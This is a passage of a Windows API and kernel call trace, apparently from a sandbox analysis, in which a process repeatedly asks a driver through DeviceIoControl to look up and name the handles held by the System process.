PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.980] ObReferenceObjectByHandle (in: Handle=0xffffffff80000560, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f75050, HandleInformation=0x0) returned 0x0 [0199.980] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.980] PsReleaseProcessExitSynchronization () returned 0x2 [0199.980] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.980] ObQueryNameString (in: Object=0xfffffa8001f75050, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.980] ObfDereferenceObject (Object=0xfffffa8001f75050) returned 0x2 [0199.980] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.980] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.980] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.980] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.980] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.980] PsAcquireProcessExitSynchronization () returned 0x0 [0199.980] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.980] ObReferenceObjectByHandle (in: Handle=0xffffffff80000564, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003aa3510, HandleInformation=0x0) returned 0x0 [0199.980] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.980] PsReleaseProcessExitSynchronization () returned 0x2 [0199.981] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.981] ObQueryNameString (in: Object=0xfffffa8003aa3510, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.981] ObfDereferenceObject (Object=0xfffffa8003aa3510) returned 0x2 [0199.981] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.981] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.981] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.981] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.981] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.981] PsAcquireProcessExitSynchronization () returned 0x0 [0199.981] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.981] ObReferenceObjectByHandle (in: Handle=0xffffffff80000568, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800379af20, HandleInformation=0x0) returned 0x0 [0199.981] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.981] PsReleaseProcessExitSynchronization () returned 0x2 [0199.981] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.981] ObQueryNameString (in: Object=0xfffffa800379af20, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.981] ObfDereferenceObject (Object=0xfffffa800379af20) returned 0x2 [0199.981] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.981] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.982] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.982] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.982] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.982] PsAcquireProcessExitSynchronization () returned 0x0 [0199.982] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.982] ObReferenceObjectByHandle (in: Handle=0xffffffff8000056c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ecfa90, HandleInformation=0x0) returned 0x0 [0199.982] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.982] PsReleaseProcessExitSynchronization () returned 0x2 [0199.995] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.995] ObQueryNameString (in: Object=0xfffffa8001ecfa90, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.995] ObfDereferenceObject (Object=0xfffffa8001ecfa90) returned 0x2 [0199.995] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.996] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.996] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.996] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.996] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.996] PsAcquireProcessExitSynchronization () returned 0x0 [0199.996] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.996] ObReferenceObjectByHandle (in: Handle=0xffffffff800005b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800bb87f20, HandleInformation=0x0) returned 0x0 [0199.996] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.996] PsReleaseProcessExitSynchronization () returned 0x2 [0199.997] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.997] ObQueryNameString (in: Object=0xfffffa800bb87f20, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.997] ObfDereferenceObject (Object=0xfffffa800bb87f20) returned 0x2 [0199.997] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.997] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.997] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.997] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.997] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.997] PsAcquireProcessExitSynchronization () returned 0x0 [0199.997] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.997] ObReferenceObjectByHandle (in: Handle=0xffffffff800005c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed4400, HandleInformation=0x0) returned 0x0 [0199.997] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.998] PsReleaseProcessExitSynchronization () returned 0x2 [0199.998] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.998] ObQueryNameString (in: Object=0xfffffa8001ed4400, ObjectNameInfo=0xfffffa8002c1e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8002c1e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.998] ObfDereferenceObject (Object=0xfffffa8001ed4400) returned 0x2 [0199.998] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.998] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.998] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.998] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xce, lpOverlapped=0x0) returned 1 [0199.998] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.998] PsAcquireProcessExitSynchronization () returned 0x0 [0199.998] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.999] ObReferenceObjectByHandle (in: Handle=0xffffffff800005d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002152340, HandleInformation=0x0) returned 0x0 [0199.999] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.999] PsReleaseProcessExitSynchronization () returned 0x2 [0199.999] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.999] ObQueryNameString (in: Object=0xfffffa8002152340, ObjectNameInfo=0xfffffa8003201044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003201044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.999] ObfDereferenceObject (Object=0xfffffa8002152340) returned 0x2 [0199.999] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.999] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.999] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.999] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.999] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.000] PsAcquireProcessExitSynchronization () returned 0x0 [0200.000] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.000] ObReferenceObjectByHandle (in: Handle=0xffffffff800005f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f86550, HandleInformation=0x0) returned 0x0 [0200.000] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.000] PsReleaseProcessExitSynchronization () returned 0x2 [0200.000] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.000] ObQueryNameString (in: Object=0xfffffa8001f86550, ObjectNameInfo=0xfffffa8003198044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.000] ObfDereferenceObject (Object=0xfffffa8001f86550) returned 0x2 [0200.000] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.000] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.000] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.000] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.001] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.001] PsAcquireProcessExitSynchronization () returned 0x0 [0200.001] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.001] ObReferenceObjectByHandle (in: Handle=0xffffffff800005fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a75f20, HandleInformation=0x0) returned 0x0 [0200.001] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.001] PsReleaseProcessExitSynchronization () returned 0x2 [0200.001] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.001] ObQueryNameString (in: Object=0xfffffa8003a75f20, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.001] ObfDereferenceObject (Object=0xfffffa8003a75f20) returned 0x2 [0200.001] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.008] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.008] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.008] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.008] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.009] PsAcquireProcessExitSynchronization () returned 0x0 [0200.009] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.009] ObReferenceObjectByHandle (in: Handle=0xffffffff80000600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f95980, HandleInformation=0x0) returned 0x0 [0200.009] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.009] PsReleaseProcessExitSynchronization () returned 0x2 [0200.009] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.009] ObQueryNameString (in: Object=0xfffffa8001f95980, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.009] ObfDereferenceObject (Object=0xfffffa8001f95980) returned 0x2 [0200.009] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.009] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.009] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.010] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.010] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.010] PsAcquireProcessExitSynchronization () returned 0x0 [0200.010] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.010] ObReferenceObjectByHandle (in: Handle=0xffffffff80000604, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed6200, HandleInformation=0x0) returned 0x0 [0200.010] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.010] PsReleaseProcessExitSynchronization () returned 0x2 [0200.010] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.010] ObQueryNameString (in: Object=0xfffffa8001ed6200, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.010] ObfDereferenceObject (Object=0xfffffa8001ed6200) returned 0x2 [0200.010] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.010] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.010] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.011] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.011] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.011] PsAcquireProcessExitSynchronization () returned 0x0 [0200.011] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.011] ObReferenceObjectByHandle (in: Handle=0xffffffff80000608, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f932f0, HandleInformation=0x0) returned 0x0 [0200.011] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.011] PsReleaseProcessExitSynchronization () returned 0x2 [0200.011] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.011] ObQueryNameString (in: Object=0xfffffa8001f932f0, ObjectNameInfo=0xfffffa8003163044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003163044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.011] ObfDereferenceObject (Object=0xfffffa8001f932f0) returned 0x2 [0200.011] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.011] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.012] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.012] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.012] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.012] PsAcquireProcessExitSynchronization () returned 0x0 [0200.012] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.012] ObReferenceObjectByHandle (in: Handle=0xffffffff80000610, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f948b0, HandleInformation=0x0) returned 0x0 [0200.012] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.012] PsReleaseProcessExitSynchronization () returned 0x2 [0200.012] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.012] ObQueryNameString (in: Object=0xfffffa8001f948b0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.012] ObfDereferenceObject (Object=0xfffffa8001f948b0) returned 0x2 [0200.012] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.013] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.013] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.013] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.013] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.013] PsAcquireProcessExitSynchronization () returned 0x0 [0200.013] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.013] ObReferenceObjectByHandle (in: Handle=0xffffffff80000614, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed6890, HandleInformation=0x0) returned 0x0 [0200.013] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.013] PsReleaseProcessExitSynchronization () returned 0x2 [0200.013] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.013] ObQueryNameString (in: Object=0xfffffa8001ed6890, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.013] ObfDereferenceObject (Object=0xfffffa8001ed6890) returned 0x2 [0200.013] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.014] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.014] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.014] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.014] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.014] PsAcquireProcessExitSynchronization () returned 0x0 [0200.014] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.014] ObReferenceObjectByHandle (in: Handle=0xffffffff80000618, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f93d20, HandleInformation=0x0) returned 0x0 [0200.014] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.014] PsReleaseProcessExitSynchronization () returned 0x2 [0200.014] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.014] ObQueryNameString (in: Object=0xfffffa8001f93d20, ObjectNameInfo=0xfffffa8003162044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003162044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.014] ObfDereferenceObject (Object=0xfffffa8001f93d20) returned 0x2 [0200.014] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.014] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.014] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.014] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.014] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.014] PsAcquireProcessExitSynchronization () returned 0x0 [0200.014] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.014] ObReferenceObjectByHandle (in: Handle=0xffffffff8000061c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039179a0, HandleInformation=0x0) returned 0x0 [0200.014] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.015] PsReleaseProcessExitSynchronization () returned 0x2 [0200.015] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a 